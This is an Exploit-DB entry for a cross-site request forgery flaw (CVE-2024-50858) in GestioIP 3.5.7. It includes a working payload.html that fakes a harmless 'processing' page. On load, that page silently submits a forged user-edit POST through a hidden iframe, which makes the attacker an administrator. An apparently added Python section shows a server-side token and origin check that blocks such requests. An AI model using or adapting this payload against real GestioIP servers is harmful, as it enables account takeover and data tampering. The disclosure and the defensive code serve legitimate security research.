[remote] GestioIP 3.5.7 - Cross-Site Request Forgery (CSRF)
GestioIP 3.5.7 has a CSRF vulnerability that lets an attacker perform unauthorized actions (such as modifying or deleting data) through a malicious link. Exploitation requires the User Management feature to be enabled and is triggered through a hosted payload.html file. 2025-4-14 00:0:0 Author: www.exploit-db.com

# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Request Forgery (CSRF)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email: max.cybersecurity at belino.com
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50858
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50858

### Description

Many GestioIP endpoints are vulnerable to CSRF. This allows an attacker to execute actions on the application through the admin's browser if the admin visits a malicious URL hosted by the attacker. These actions can modify, delete, or exfiltrate data from the application.

### Prerequisites

The option "Manage - Manage GestioIP - User Management" must be enabled beforehand.


### Usage

To exploit this vulnerability, an attacker must host `payload.html` on an attacker-controlled web server (e.g. `python3 -m http.server 8090`). When an authenticated administrator visits the attacker's website, the CSRF request is submitted and makes the attacker an administrator.


### File: payload.html
#### example: editing user named 'maxi'


```html
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Welcome to our site</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      text-align: center;
    }
    .container {
      margin-top: 50px;
    }
    iframe {
      display: none;
    }
  </style>
</head>
<body>
  <div class="container">
    <h1>Thank you for visiting our site!</h1>
    <p>We are processing your request, please wait a moment...</p>
    <img src="https://placehold.co/150?text=Processing" alt="Processing...">
  </div>

  <!-- hidden iframe: the response to the forged POST lands here, out of sight -->
  <iframe name="hiddenFrame"></iframe>

  <!-- The form that makes the POST to the GestioIP server -->
  <form action="http://localhost/gestioip/res/ip_mod_user.cgi" method="POST" target="hiddenFrame">
    <input type="hidden" name="name" value="maxi">
    <input type="hidden" name="group_id" value="1">
    <input type="hidden" name="email" value="[email protected]">
    <input type="hidden" name="phone" value="123">
    <input type="hidden" name="comment" value="">
    <input type="hidden" name="client_id" value="1">
    <input type="hidden" name="id" value="2">
    <input type="hidden" name="B2" value="">
  </form>

  <script>
    // Rewrite the visible URL, then auto-submit the form on page load
    history.pushState('', '', '/');
    document.forms[0].submit();
  </script>
</body>
</html>
```
            

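As an added defensive illustration (not GestioIP's own Perl CGI code), this is the check a handler such as `ip_mod_user.cgi` would need so that a forged POST like the one above is refused: a per-session token the UI embeds in every state-changing form, with `Origin`/`Referer` and `Sec-Fetch-Site` as extra signals. The secret, the attacker host name and the session value are constructed for the example.

```python
"""Server-side CSRF validation for a GestioIP-style form handler (illustrative)."""
import hashlib
import hmac
from dataclasses import dataclass, field
from typing import Optional

SERVER_SECRET = b"hypothetical-server-secret"   # constructed; keep out of source in reality
ALLOWED_ORIGINS = {"http://localhost"}           # where the GestioIP UI is served from


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


def csrf_token_for(session_id: str) -> str:
    """Derive the token the UI embeds in each form for this session (HMAC, no server-side store)."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def reject_reason(req: Request) -> Optional[str]:
    """Return None if the state change may proceed, otherwise why it is refused."""
    if req.method != "POST":
        return "state change requires POST"
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if not any(origin == o or origin.startswith(o + "/") for o in ALLOWED_ORIGINS):
        return f"cross-origin source {origin!r}"
    # Browsers set Sec-Fetch-Site on form posts; a missing header is treated as same-origin
    if req.headers.get("Sec-Fetch-Site", "same-origin") not in ("same-origin", "none"):
        return "Sec-Fetch-Site reports cross-site"
    session = req.cookies.get("session")
    if not session:
        return "no session cookie"
    token = req.form.get("csrf_token", "")
    if not hmac.compare_digest(token, csrf_token_for(session)):
        return "missing or wrong csrf_token"
    return None


# Constructed requests: the forged POST from payload.html, and the same edit made from the UI.
FORGED = Request("POST", "/gestioip/res/ip_mod_user.cgi",
                 headers={"Origin": "http://attacker.example:8090", "Sec-Fetch-Site": "cross-site"},
                 cookies={"session": "abc123"},
                 form={"name": "maxi", "group_id": "1", "id": "2", "B2": ""})
LEGIT = Request("POST", "/gestioip/res/ip_mod_user.cgi",
                headers={"Origin": "http://localhost", "Sec-Fetch-Site": "same-origin"},
                cookies={"session": "abc123"},
                form={"name": "maxi", "group_id": "1", "id": "2", "B2": "",
                      "csrf_token": csrf_token_for("abc123")})
```

The forged request fails at the origin check before the token is even consulted; a request that spoofs an allowed origin but lacks the token is still refused.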
Source: https://www.exploit-db.com/exploits/52200